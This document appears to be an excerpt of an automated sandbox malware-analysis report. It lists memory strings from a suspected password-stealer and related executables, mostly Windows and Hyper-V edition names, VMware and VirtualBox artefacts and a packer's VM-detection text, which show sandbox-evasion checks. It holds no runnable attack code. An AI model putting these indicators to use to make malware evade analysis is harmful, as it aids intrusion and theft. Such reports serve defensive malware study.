Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.000000000101C000.00000040.00000001.01000000.00000003.sdmp, a37ec701f3.exe, a37ec701f3.exe, 0000000B.00000002.1969439309.000000000035C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 R2 Server Datacenter without Hyper-V (core)
Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.000000000101C000.00000040.00000001.01000000.00000003.sdmp, a37ec701f3.exe, a37ec701f3.exe, 0000000B.00000002.1969439309.000000000035C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 11 Server Standard without Hyper-V (core)
Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.000000000101C000.00000040.00000001.01000000.00000003.sdmp, a37ec701f3.exe, a37ec701f3.exe, 0000000B.00000002.1969439309.000000000035C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8.1 Essential Server Solutions without Hyper-V
Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.000000000101C000.00000040.00000001.01000000.00000003.sdmp, a37ec701f3.exe, a37ec701f3.exe, 0000000B.00000002.1969439309.000000000035C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 R2 Server Standard without Hyper-V (core)
Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.000000000101C000.00000040.00000001.01000000.00000003.sdmp, a37ec701f3.exe, 0000000B.00000002.1969439309.000000000035C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Hyper-V (guest)
Source: Amcache.hve.4.dr Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.4.dr Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.000000000101C000.00000040.00000001.01000000.00000003.sdmp, a37ec701f3.exe, a37ec701f3.exe, 0000000B.00000002.1969439309.000000000035C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 Essential Server Solutions without Hyper-V
Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.000000000101C000.00000040.00000001.01000000.00000003.sdmp, a37ec701f3.exe, a37ec701f3.exe, 0000000B.00000002.1969439309.000000000035C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 10 Microsoft Hyper-V Server
Source: Amcache.hve.4.dr Binary or memory string: vmci.syshbin`
Source: Amcache.hve.4.dr Binary or memory string: \driver\vmci,\driver\pci
Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.000000000101C000.00000040.00000001.01000000.00000003.sdmp, a37ec701f3.exe, a37ec701f3.exe, 0000000B.00000002.1969439309.000000000035C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 R2 Server Datacenter without Hyper-V (full)
Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.000000000114C000.00000040.00000001.01000000.00000003.sdmp, a37ec701f3.exe, a37ec701f3.exe, 0000000B.00000002.1969439309.000000000048C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: ~VirtualMachineTypes
Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.000000000114C000.00000040.00000001.01000000.00000003.sdmp, a37ec701f3.exe, a37ec701f3.exe, 0000000B.00000002.1969439309.000000000048C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: ]DLL_Loader_VirtualMachine
Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.000000000101C000.00000040.00000001.01000000.00000003.sdmp, a37ec701f3.exe, a37ec701f3.exe, 0000000B.00000002.1969439309.000000000035C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2016 Microsoft Hyper-V Server
Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.000000000114C000.00000040.00000001.01000000.00000003.sdmp, a37ec701f3.exe, 0000000B.00000002.1969439309.000000000048C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: DLL_Loader_Marker]DLL_Loader_VirtualMachineZDLL_Loader_Reloc_Unit
Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.000000000101C000.00000040.00000001.01000000.00000003.sdmp, a37ec701f3.exe, 0000000B.00000002.1969439309.000000000035C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: /Windows 2012 R2 Server Standard without Hyper-V
Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.000000000101C000.00000040.00000001.01000000.00000003.sdmp, a37ec701f3.exe, a37ec701f3.exe, 0000000B.00000002.1969439309.000000000035C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 11 Server Standard without Hyper-V
Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.000000000101C000.00000040.00000001.01000000.00000003.sdmp, a37ec701f3.exe, 0000000B.00000002.1969439309.000000000035C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: )Windows 8 Server Standard without Hyper-V
Source: BGIIDAEBGC.exe, 00000005.00000002.1905859514.0000000000698000.00000040.00000001.01000000.00000009.sdmp, explorti.exe, 00000008.00000002.4133646158.00000000009A8000.00000040.00000001.01000000.0000000D.sdmp, explorti.exe, 0000000C.00000002.2140291996.00000000009A8000.00000040.00000001.01000000.0000000D.sdmp, explorti.exe, 0000000E.00000002.2741569840.00000000009A8000.00000040.00000001.01000000.0000000D.sdmp, explorti.exe, 0000000F.00000002.3340026597.00000000009A8000.00000040.00000001.01000000.0000000D.sdmp, explorti.exe, 00000010.00000002.3940679044.00000000009A8000.00000040.00000001.01000000.0000000D.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.000000000101C000.00000040.00000001.01000000.00000003.sdmp, a37ec701f3.exe, a37ec701f3.exe, 0000000B.00000002.1969439309.000000000035C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 11 Server Enterprise without Hyper-V (full)
Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.000000000101C000.00000040.00000001.01000000.00000003.sdmp, a37ec701f3.exe, 0000000B.00000002.1969439309.000000000035C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 5Windows 2016 Server Datacenter without Hyper-V (core)
Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.000000000101C000.00000040.00000001.01000000.00000003.sdmp, a37ec701f3.exe, a37ec701f3.exe, 0000000B.00000002.1969439309.000000000035C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 11 Server Datacenter without Hyper-V (full)
Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.000000000101C000.00000040.00000001.01000000.00000003.sdmp, a37ec701f3.exe, 0000000B.00000002.1969439309.000000000035C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 5Windows 2016 Server Enterprise without Hyper-V (core)
Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.000000000101C000.00000040.00000001.01000000.00000003.sdmp, a37ec701f3.exe, 0000000B.00000002.1969439309.000000000035C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: %Windows 2012 Microsoft Hyper-V Server
Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.000000000101C000.00000040.00000001.01000000.00000003.sdmp, a37ec701f3.exe, 0000000B.00000002.1969439309.000000000035C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Hyper-V
Source: Amcache.hve.4.dr Binary or memory string: VMware
Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.000000000101C000.00000040.00000001.01000000.00000003.sdmp, a37ec701f3.exe, 0000000B.00000002.1969439309.000000000035C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: $Windows 8.1 Microsoft Hyper-V Server
Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.000000000101C000.00000040.00000001.01000000.00000003.sdmp, a37ec701f3.exe, 0000000B.00000002.1969439309.000000000035C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: ,Windows 2012 Server Standard without Hyper-V
Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.000000000101C000.00000040.00000001.01000000.00000003.sdmp, a37ec701f3.exe, 0000000B.00000002.1969439309.000000000035C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 3Windows 10 Server Datacenter without Hyper-V (full)
Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.000000000101C000.00000040.00000001.01000000.00000003.sdmp, a37ec701f3.exe, a37ec701f3.exe, 0000000B.00000002.1969439309.000000000035C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 Microsoft Hyper-V Server
Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.000000000101C000.00000040.00000001.01000000.00000003.sdmp, a37ec701f3.exe, a37ec701f3.exe, 0000000B.00000002.1969439309.000000000035C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 Server Enterprise without Hyper-V (core)
Source: Amcache.hve.4.dr Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.000000000101C000.00000040.00000001.01000000.00000003.sdmp, a37ec701f3.exe, 0000000B.00000002.1969439309.000000000035C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 8Windows 2012 R2 Server Datacenter without Hyper-V (core)
Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.000000000101C000.00000040.00000001.01000000.00000003.sdmp, a37ec701f3.exe, a37ec701f3.exe, 0000000B.00000002.1969439309.000000000035C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 10 Essential Server Solutions without Hyper-V
Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.000000000101C000.00000040.00000001.01000000.00000003.sdmp, a37ec701f3.exe, a37ec701f3.exe, 0000000B.00000002.1969439309.000000000035C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8 Essential Server Solutions without Hyper-V
Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1852046462.0000000001B2A000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 00000008.00000002.4134557911.00000000012F7000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 00000008.00000002.4134557911.0000000001324000.00000004.00000020.00020000.00000000.sdmp, a37ec701f3.exe, 0000000B.00000002.1970868241.000000000146C000.00000004.00000020.00020000.00000000.sdmp, a37ec701f3.exe, 0000000B.00000002.1970868241.000000000144B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.000000000101C000.00000040.00000001.01000000.00000003.sdmp, a37ec701f3.exe, 0000000B.00000002.1969439309.000000000035C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 8Windows 2012 R2 Server Datacenter without Hyper-V (full)
Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.000000000101C000.00000040.00000001.01000000.00000003.sdmp, a37ec701f3.exe, a37ec701f3.exe, 0000000B.00000002.1969439309.000000000035C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 10 Server Standard without Hyper-V (core)
Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.000000000101C000.00000040.00000001.01000000.00000003.sdmp, a37ec701f3.exe, a37ec701f3.exe, 0000000B.00000002.1969439309.000000000035C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8.1 Server Enterprise without Hyper-V (core)
Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.000000000101C000.00000040.00000001.01000000.00000003.sdmp, a37ec701f3.exe, a37ec701f3.exe, 0000000B.00000002.1969439309.000000000035C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 R2 Server Enterprise without Hyper-V (core)
Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.000000000101C000.00000040.00000001.01000000.00000003.sdmp, a37ec701f3.exe, 0000000B.00000002.1969439309.000000000035C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 7Windows 2012 Essential Server Solutions without Hyper-V
Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.000000000101C000.00000040.00000001.01000000.00000003.sdmp, a37ec701f3.exe, a37ec701f3.exe, 0000000B.00000002.1969439309.000000000035C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8 Server Enterprise without Hyper-V (full)
Source: Amcache.hve.4.dr Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.000000000101C000.00000040.00000001.01000000.00000003.sdmp, a37ec701f3.exe, a37ec701f3.exe, 0000000B.00000002.1969439309.000000000035C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2016 Server Enterprise without Hyper-V (core)
Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.000000000101C000.00000040.00000001.01000000.00000003.sdmp, a37ec701f3.exe, a37ec701f3.exe, 0000000B.00000002.1969439309.000000000035C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2016 Server Datacenter without Hyper-V (full)
Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.000000000101C000.00000040.00000001.01000000.00000003.sdmp, a37ec701f3.exe, a37ec701f3.exe, 0000000B.00000002.1969439309.000000000035C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8.1 Server Datacenter without Hyper-V (full)
Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.000000000101C000.00000040.00000001.01000000.00000003.sdmp, a37ec701f3.exe, 0000000B.00000002.1969439309.000000000035C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: %Windows 2016 Microsoft Hyper-V Server
Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.000000000101C000.00000040.00000001.01000000.00000003.sdmp, a37ec701f3.exe, 0000000B.00000002.1969439309.000000000035C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 5Windows 2012 Server Enterprise without Hyper-V (full)
Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.000000000101C000.00000040.00000001.01000000.00000003.sdmp, a37ec701f3.exe, 0000000B.00000002.1969439309.000000000035C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 3Windows 10 Server Enterprise without Hyper-V (core)
Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.000000000101C000.00000040.00000001.01000000.00000003.sdmp, a37ec701f3.exe, 0000000B.00000002.1969439309.000000000035C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 3Windows 11 Server Datacenter without Hyper-V (core)
Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.000000000101C000.00000040.00000001.01000000.00000003.sdmp, a37ec701f3.exe, 0000000B.00000002.1969439309.000000000035C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 7Windows 2016 Essential Server Solutions without Hyper-V
Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.000000000101C000.00000040.00000001.01000000.00000003.sdmp, a37ec701f3.exe, 0000000B.00000002.1969439309.000000000035C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: +Windows 8.1 Server Standard without Hyper-V
Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.000000000101C000.00000040.00000001.01000000.00000003.sdmp, a37ec701f3.exe, a37ec701f3.exe, 0000000B.00000002.1969439309.000000000035C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2016 Server Standard without Hyper-V
Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.000000000101C000.00000040.00000001.01000000.00000003.sdmp, a37ec701f3.exe, 0000000B.00000002.1969439309.000000000035C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 3Windows 10 Server Datacenter without Hyper-V (core)
Source: Amcache.hve.4.dr Binary or memory string: VMware20,1
Source: Amcache.hve.4.dr Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.4.dr Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.4.dr Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: a37ec701f3.exe, 0000000B.00000002.1970868241.0000000001414000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware
Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.000000000101C000.00000040.00000001.01000000.00000003.sdmp, a37ec701f3.exe, a37ec701f3.exe, 0000000B.00000002.1969439309.000000000035C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 11 Server Enterprise without Hyper-V (core)
Source: Amcache.hve.4.dr Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.4.dr Binary or memory string: VMware VMCI Bus Device
Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1852046462.0000000001ABE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware2u
Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.000000000101C000.00000040.00000001.01000000.00000003.sdmp, a37ec701f3.exe, a37ec701f3.exe, 0000000B.00000002.1969439309.000000000035C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 11 Server Datacenter without Hyper-V (core)
Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.000000000101C000.00000040.00000001.01000000.00000003.sdmp, a37ec701f3.exe, 0000000B.00000002.1969439309.000000000035C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 4Windows 8.1 Server Enterprise without Hyper-V (full)
Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.000000000101C000.00000040.00000001.01000000.00000003.sdmp, a37ec701f3.exe, 0000000B.00000002.1969439309.000000000035C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 5Windows 2016 Server Enterprise without Hyper-V (full)
Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.000000000101C000.00000040.00000001.01000000.00000003.sdmp, a37ec701f3.exe, 0000000B.00000002.1969439309.000000000035C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 2Windows 8 Server Datacenter without Hyper-V (core)
Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.000000000101C000.00000040.00000001.01000000.00000003.sdmp, a37ec701f3.exe, a37ec701f3.exe, 0000000B.00000002.1969439309.000000000035C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 10 Server Enterprise without Hyper-V (core)
Source: Amcache.hve.4.dr Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.000000000101C000.00000040.00000001.01000000.00000003.sdmp, a37ec701f3.exe, a37ec701f3.exe, 0000000B.00000002.1969439309.000000000035C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 10 Server Datacenter without Hyper-V (full)
Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.000000000101C000.00000040.00000001.01000000.00000003.sdmp, a37ec701f3.exe, 0000000B.00000002.1969439309.000000000035C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: :Windows 2012 R2 Essential Server Solutions without Hyper-V
Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.000000000101C000.00000040.00000001.01000000.00000003.sdmp, a37ec701f3.exe, 0000000B.00000002.1969439309.000000000035C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 5Windows 11 Essential Server Solutions without Hyper-V
Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.000000000101C000.00000040.00000001.01000000.00000003.sdmp, a37ec701f3.exe, a37ec701f3.exe, 0000000B.00000002.1969439309.000000000035C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2016 Server Standard without Hyper-V (core)
Source: Amcache.hve.4.dr Binary or memory string: vmci.syshbin
Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.000000000101C000.00000040.00000001.01000000.00000003.sdmp, a37ec701f3.exe, a37ec701f3.exe, 0000000B.00000002.1969439309.000000000035C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8 Server Standard without Hyper-V (core)
Source: Amcache.hve.4.dr Binary or memory string: VMware, Inc.
Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.000000000101C000.00000040.00000001.01000000.00000003.sdmp, a37ec701f3.exe, 0000000B.00000002.1969439309.000000000035C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 5Windows 10 Essential Server Solutions without Hyper-V
Source: Amcache.hve.4.dr Binary or memory string: VMware20,1hbin@
Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.000000000101C000.00000040.00000001.01000000.00000003.sdmp, a37ec701f3.exe, 0000000B.00000002.1969439309.000000000035C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 8Windows 2012 R2 Server Enterprise without Hyper-V (core)
Source: a37ec701f3.exe, 0000000B.00000002.1969439309.000000000035C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: xVBoxService.exe
Source: Amcache.hve.4.dr Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.000000000101C000.00000040.00000001.01000000.00000003.sdmp, a37ec701f3.exe, a37ec701f3.exe, 0000000B.00000002.1969439309.000000000035C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 Server Datacenter without Hyper-V (core)
Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.000000000101C000.00000040.00000001.01000000.00000003.sdmp, a37ec701f3.exe, 0000000B.00000002.1969439309.000000000035C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 3Windows 10 Server Enterprise without Hyper-V (full)
Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.000000000101C000.00000040.00000001.01000000.00000003.sdmp, a37ec701f3.exe, a37ec701f3.exe, 0000000B.00000002.1969439309.000000000035C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8.1 Server Enterprise without Hyper-V (full)
Source: Amcache.hve.4.dr Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.000000000101C000.00000040.00000001.01000000.00000003.sdmp, a37ec701f3.exe, a37ec701f3.exe, 0000000B.00000002.1969439309.000000000035C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8 Server Enterprise without Hyper-V (core)
Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.000000000101C000.00000040.00000001.01000000.00000003.sdmp, a37ec701f3.exe, 0000000B.00000002.1969439309.000000000035C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: *Windows 11 Server Standard without Hyper-V
Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.000000000101C000.00000040.00000001.01000000.00000003.sdmp, a37ec701f3.exe, a37ec701f3.exe, 0000000B.00000002.1969439309.000000000035C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 R2 Essential Server Solutions without Hyper-V
Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.000000000101C000.00000040.00000001.01000000.00000003.sdmp, a37ec701f3.exe, 0000000B.00000002.1969439309.000000000035C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: ,Windows 2016 Server Standard without Hyper-V
Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.000000000101C000.00000040.00000001.01000000.00000003.sdmp, a37ec701f3.exe, a37ec701f3.exe, 0000000B.00000002.1969439309.000000000035C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 Server Standard without Hyper-V (core)
Source: Amcache.hve.4.dr Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.000000000101C000.00000040.00000001.01000000.00000003.sdmp, a37ec701f3.exe, a37ec701f3.exe, 0000000B.00000002.1969439309.000000000035C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8.1 Server Datacenter without Hyper-V (core)
Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.000000000101C000.00000040.00000001.01000000.00000003.sdmp, a37ec701f3.exe, a37ec701f3.exe, 0000000B.00000002.1969439309.000000000035C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8 Server Datacenter without Hyper-V (full)
